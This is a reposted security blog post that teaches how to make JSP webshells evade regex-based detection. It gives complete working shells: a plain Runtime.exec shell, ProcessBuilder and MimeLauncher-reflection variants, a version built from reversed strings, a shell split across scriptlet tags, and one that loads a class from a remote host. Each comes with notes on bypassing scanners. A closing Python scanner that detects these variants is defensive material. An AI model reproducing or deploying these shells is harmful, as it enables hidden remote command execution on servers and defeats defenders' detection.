A few tips on evading detection with common JSP webshells

admin, 2024-02-05 13:54:13

0x01

I have recently been looking into Java security, and ended up looking at ways of evading detection with JSP webshells. Below are my own ideas on JSP webshell evasion, shared for everyone.

0x02. Built-in function evasion / MimeLauncher + reflection

A plain JSP shell takes a GET parameter and passes it straight to the exec method of Runtime. If the scanner's regex matches Runtime.getRuntime().exec, this is trivially caught:

<%
  if ("023".equals(request.getParameter("pwd"))) {
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while ((a = in.read(b)) != -1) {
      // only the bytes actually read this round, not the stale tail of the buffer
      out.println(new String(b, 0, a));
    }
    out.print("</pre>");
  }
%>

We can replace Runtime.getRuntime().exec() with ProcessBuilder: Runtime.exec() itself ends up calling into ProcessBuilder, so using ProcessBuilder directly gives the same behaviour while the Runtime regex never matches. Note that a one-element String[] makes the whole parameter the program name, so "id" works but "ls -la" would be looked up as a program literally called "ls -la".

<%@ page import="java.io.*" %>
<%
  String pentest = request.getParameter("pentest");
  // single-element argv: the parameter is the program name, no shell parsing happens
  Process process = new ProcessBuilder(new String[]{pentest}).start();
  InputStream is = process.getInputStream();
  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));
  String r = null;
  while ((r = bufferedReader.readLine()) != null) {
    response.getWriter().println(r);
  }
%>

sun.net.www.MimeLauncher.run() also ends in Runtime.getRuntime().exec(), so it can execute commands as well, but the class is not public and has to be constructed and driven through reflection. Two caveats: run() discards the Process, so the command's output is not returned to the client, and on JDK 16 and later the sun.net.www package is not opened to unnamed modules, so the setAccessible(true) calls throw InaccessibleObjectException; the sample below targets JDK 8.

<%@ page import="java.io.*" %>
<%@ page import="java.net.URLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="sun.net.www.MimeEntry" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page language="java" pageEncoding="UTF-8" %>
<%
  String cmd = request.getParameter("cmd");
  // the MimeLauncher constructor takes a URLConnection; it is never actually connected
  URLConnection urlConnection = new URL("http://127.0.0.1%s").openConnection();
  MimeEntry mimeEntry = new MimeEntry("naihe");
  Class meClass = MimeEntry.class;
  // the constructor runs findExecutablePath() on MimeEntry.command: its first token must be
  // an existing file (use an absolute path such as /bin/ls), otherwise construction fails
  Field field = meClass.getDeclaredField("command");
  field.setAccessible(true);
  field.set(mimeEntry, cmd);
  // run() derives a temp file name from this template, so it must contain a "%s"
  Field field2 = meClass.getDeclaredField("tempFileNameTemplate");
  field2.setAccessible(true);
  field2.set(mimeEntry, "naihe%s567");
  // empty stream: run() copies it into the temp file before exec'ing
  InputStream inputStream = new InputStream() {
    @Override
    public int read() throws IOException {
      return -1;
    }
  };
  Class mimeClass = Class.forName("sun.net.www.MimeLauncher");
  Constructor mimeCon = mimeClass.getDeclaredConstructor(MimeEntry.class, URLConnection.class,
      InputStream.class, String.class, String.class);
  mimeCon.setAccessible(true);
  Thread thread = (Thread) mimeCon.newInstance(mimeEntry, urlConnection, inputStream, "0", "0");
  // execPath is the string run() finally hands to Runtime.getRuntime().exec()
  // (with " <tempfile" appended when it contains no "%s")
  Field field3 = mimeClass.getDeclaredField("execPath");
  field3.setAccessible(true);
  field3.set(thread, cmd);
  Method m = mimeClass.getDeclaredMethod("run");
  m.setAccessible(true);
  m.invoke(thread);
%>

0x03. CDATA feature + reflection + string reversal

This uses a feature of the XML JSP syntax: a .jspx document is a JSP written as XML, and there the scriptlet is written as <jsp:scriptlet> instead of <% %> (its body can sit inside a <![CDATA[ ]]> section). Tomcat's parser also accepts <jsp:scriptlet> inside an ordinary .jsp file, which is what the sample below relies on, since it mixes it with <%@ %> directives and a <%! %> declaration. Combined with reflection and reversed string literals, neither "Runtime" nor "exec" appears anywhere in the source:

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method" %>
<%!
  public static String reverseStr(String str) {
    String reverse = "";
    int length = str.length();
    for (int i = 0; i < length; i++) {
      reverse = str.charAt(i) + reverse;
    }
    return reverse;
  }
%>
<jsp:scriptlet>
  String x = request.getParameter("x");
  if (x != null) {
    // "emitnuR.gnal.avaj" -> "java.lang.Runtime", "emitnuRteg" -> "getRuntime", "cexe" -> "exec"
    Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
    Method gr = rt.getMethod(reverseStr("emitnuRteg"));
    Method ex = rt.getMethod(reverseStr("cexe"), String.class);
    Process e = (Process) ex.invoke(gr.invoke(null), x);
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while ((a = in.read(b)) != -1) {
      out.println(new String(b, 0, a));
    }
    out.print("</pre>");
  }
</jsp:scriptlet>


0x04. Splitting a JSP webshell across multiple tags

When Tomcat compiles the page, the bodies of consecutive scriptlets are emitted one after another into the generated servlet. The template text between the tags (here just a newline) would normally become an out.write() call sitting between them and break the statement; with trimDirectiveWhitespaces='true', whitespace-only template text is dropped, so the newlines disappear and the three fragments are spliced into a single Runtime.getRuntime().exec(...) statement that no individual tag contains:

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page trimDirectiveWhitespaces='true' %>
<%Runtime%>
<%.getRuntime()%>
<%.exec(request.getParameter("test"));%>


0x05. Remotely loading a class + string reversal

Load the class directly from a remote host: the shell itself carries few signatures and has a bit of that built-in-function flavour. It is not a complete setup (the remote class is not shown), but here is the code. With the URL below, URLClassLoader fetches http://127.0.0.1:8000/com/demo/test.class at request time, so that host must be reachable from the server, and the class needs a public no-arg constructor and a public runs(String) method whose return value is written back into the response:

<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.lang.reflect.Method" %>
<%!
  public static String reverseStr(String str) {
    String reverse = "";
    int length = str.length();
    for (int i = 0; i < length; i++) {
      reverse = str.charAt(i) + reverse;
    }
    return reverse;
  }
%>
<%
  String cmd = request.getParameter("id");
  // classes are fetched from http://127.0.0.1:8000/com/demo/test.class on demand
  URL url = new URL("http://127.0.0.1:8000/");
  URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
  // debug only: prints the parent loader to the container's stdout
  System.out.println(classLoader.getParent());
  // "tset.omed.moc" -> "com.demo.test"; the class needs a public no-arg constructor
  Class shell = classLoader.loadClass(reverseStr("tset.omed.moc"));
  Object object = shell.newInstance();
  // "snur" -> "runs": public method taking the command and returning its output
  Method dm = shell.getMethod(reverseStr("snur"), String.class);
  Object invoke = dm.invoke(object, cmd);
  response.getWriter().println(invoke);
%>
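To see which of the shells in 0x02 to 0x05 a regex scanner actually catches, here is a small Python scanner, added as an example and not part of the original post. It runs the single pattern that 0x02 says most scanners rely on (Runtime.getRuntime().exec) against the raw source, then normalizes the file roughly the way Jasper does before compiling it: scriptlet bodies from <% %> and <jsp:scriptlet> are joined back-to-back (which undoes the 0x04 split), and the reverse of every string literal is appended (which undoes the 0x03 and 0x05 reversal), before a broader rule set runs. The samples are constructed, abbreviated copies of this page's shells; the rule names and the scan() / normalize() helpers are my own.

```python
import re
from typing import Dict, List

# Constructed samples, abbreviated from the shells shown on this page.
# Only the lines that matter for matching are kept.
SAMPLES: Dict[str, str] = {
    "0x02_plain_runtime":
        '<% java.io.InputStream in = Runtime.getRuntime().exec('
        'request.getParameter("i")).getInputStream(); %>',
    "0x02_processbuilder":
        '<% Process process = new ProcessBuilder(new String[]{pentest}).start(); %>',
    "0x02_mimelauncher":
        '<% Class mimeClass = Class.forName("sun.net.www.MimeLauncher");'
        ' Method m = mimeClass.getDeclaredMethod("run"); m.invoke(thread); %>',
    "0x03_reversed_reflection":
        '<jsp:scriptlet>Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));'
        ' Method ex = rt.getMethod(reverseStr("cexe"), String.class);</jsp:scriptlet>',
    "0x04_split_tags":
        "<%@ page trimDirectiveWhitespaces='true'%>\n"
        "<%Runtime%>\n<%.getRuntime()%>\n<%.exec(request.getParameter(\"test\"));%>",
    "0x05_remote_class":
        '<% URLClassLoader classLoader = new URLClassLoader(new URL[]{url});'
        ' Class shell = classLoader.loadClass(reverseStr("tset.omed.moc")); %>',
    "benign":
        '<% out.println("Hello, " + request.getParameter("name")); %>',
}

# The single pattern the page says most scanners rely on; applied to the raw file.
NAIVE = re.compile(r"Runtime\.getRuntime\(\)\.exec")

# Broader rules (my own names), applied to the normalized code. Whitespace is allowed
# between tokens because Jasper joins scriptlet bodies with newlines.
RULES = {
    "runtime_exec":       re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec"),
    "processbuilder":     re.compile(r"new\s+ProcessBuilder\s*\("),
    "mimelauncher":       re.compile(r"sun\.net\.www\.Mime(?:Launcher|Entry)"),
    "reflective_runtime": re.compile(r'java\.lang\.Runtime"'),  # visible only after literal decoding
    "remote_classloader": re.compile(r"\bURLClassLoader\b"),
}

# Scriptlet bodies: <% ... %> and <%! ... %> (directives <%@, expressions <%=
# and comments <%-- are skipped) plus the XML form <jsp:scriptlet>...</jsp:scriptlet>.
SCRIPTLET = re.compile(r"<%(?![@=\-])!?(.*?)%>|<jsp:scriptlet>(.*?)</jsp:scriptlet>", re.S)
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')


def normalize(source: str) -> str:
    """Rebuild the Java that Jasper would compile: join every scriptlet body
    back-to-back (whitespace-only template text between tags is gone, as with
    trimDirectiveWhitespaces), then append the reverse of every string literal so
    reversed identifiers such as "emitnuR.gnal.avaj" become visible to the rules."""
    bodies: List[str] = [a or b for a, b in SCRIPTLET.findall(source)]
    code = "\n".join(bodies)
    reversed_literals = ['"%s"' % lit[::-1] for lit in STRING_LITERAL.findall(code)]
    return code + "\n" + "\n".join(reversed_literals)


def scan(source: str) -> Dict[str, object]:
    """Return whether the naive pattern fires on the raw source, and which
    rules fire on the normalized code."""
    normalized = normalize(source)
    return {
        "naive": bool(NAIVE.search(source)),
        "rules": [name for name, rx in RULES.items() if rx.search(normalized)],
    }


def scan_all() -> Dict[str, Dict[str, object]]:
    """Scan every constructed sample."""
    return {name: scan(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_all().items():
        print(f"{name:26s} naive={result['naive']!s:5s} rules={result['rules']}")
```

Run directly, it prints one line per sample: only the plain shell trips the naive pattern, while the normalized rules flag each of the five variants and leave the benign page alone. Joining scriptlet bodies and decoding literals are cheap, and reversal is just one encoding; the same normalization step extends to base64- or XOR-encoded literals by adding further decoders before the rules run.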


0x06

Study hard and improve every day.

Originally published on the WeChat public account CodeA聊安全: 关于一些常见的JSP_Webshell免杀小tips

Posted by admin on 2024-02-05 13:54:13. Reprints should keep the original link (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/2464343.html
